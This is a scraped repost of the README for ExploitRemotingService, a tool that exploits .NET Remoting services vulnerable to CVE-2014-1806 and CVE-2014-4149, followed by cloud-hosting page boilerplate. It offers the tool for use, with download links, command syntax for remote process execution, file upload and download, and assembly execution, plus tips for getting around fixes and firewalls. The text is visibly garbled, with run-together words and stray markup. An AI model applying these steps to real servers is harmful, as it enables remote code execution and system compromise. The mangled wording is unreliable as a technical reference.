. NET Remote Service remote execution Vulnerability (exp) China cold Dragon Collection and finishing debut

Source: Internet
Author: User
Tags hosting cve

Source:https://github.com/tyranid/exploitremotingserviceexploit Database mirror:http://www.exploit-db.com/ Sploits/35280.zip  exploitremotingservice (c) James forshaw======================================== =====  a tool to exploit. NET Remoting Services vulnerable to cve-2014-1806 or cve-2014-4149. It only works on Windows although some aspects _might_ work in Mono on *nix.  usage instructions:=============== ====  exploitremotingservice [options] URI command [command Args]copyright (c) James Forshaw 2014   Uri:the supported URI is as follows:tcp://host:port/objname  -TCP connection on host and Portnameipc://channe l/objname    -Named Pipe channel  options:    -s,--secure                Enable Secure mode   -p,--port=value           Specify the local TCP port to listen on  -i,--ipc=value          & nbsp Specify listening pipe name for IPC channel      --user=value            specify username for secure mode      --pass= value           Specify password for secure mode       --ver=VALUE            Specify Version number for remote, 2 or 4      --usecom                use DCOM backchannel instead of. NET remoting       --remname=VALUE        Specify the remote object name to Register  -v,--VERBOSE          &Nbsp;   Enable verbose Debug output      --useser                Uses old serialization tricks, only works on                               full Type filter services  -h,-?,--help   commands:exec [-wait] program [cmdline]: Execute a process on the hosting servercmd  cmdline                  : Execute a command line Process and display stdoutput  LocalFile remotefile    : Upload a file to the hosting serverget& nbsp RemoteFile localfile    : Download a file from the hosting serverls   remotedir & nbsp;             : List A remote directoryrun  file [args]              : Upload and execute an assembly, calls entry pointuser       & nbsp;                 : Print the current usernamever                           : Print the OS version  this tool Supports exploit both TCP remoting services and local IPC services. To test the exploit your need to know the name of the. NET Remoting service and the port it "slistening on (for TCP) o R the name of the Named Pipe (for IPC). You can normally find this in the server or client code. Look for things like calls To:  remotingconfiguration.registerwellknownservicetype or Activator.createinstance  you CAn and try the exploit by constructing a appropriate URL. If TCP can use The url format tcp://hostname:port/servicename. For IPC use ipc://namedpipename/servicename.   a simple test are to do:   Exploitremotingservice serviceurl ver  if Successful It should print the OS version of the hosting. NET Remoting Service. If you get an exception it might is fixed with cve-2014-1806. At this point try the com version using:  exploitremotingservice-usecom serviceurl ver  this Works best locally but can work remotely if you modify the COM configuration anddisable the firewall you should being able to Get it to work. If that still doesn ' t workthen it might is an up to date server. Instead can also try the full serialization version using.  exploitremotingservice-useser serviceurl LS c:\  for The remoting service must be running with full TypeFilter mode-enabled (which is some, E SpeciAlly IPC Services). It also only works with the commands LS, Putand get. But that should is enough to compromise a box.   

I ' ve provided an example service to test against.


: Http://pan.baidu.com/s/1s9BdW

. NET Remote Service remote execution Vulnerability (exp) China cold Dragon Collection and finishing debut

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.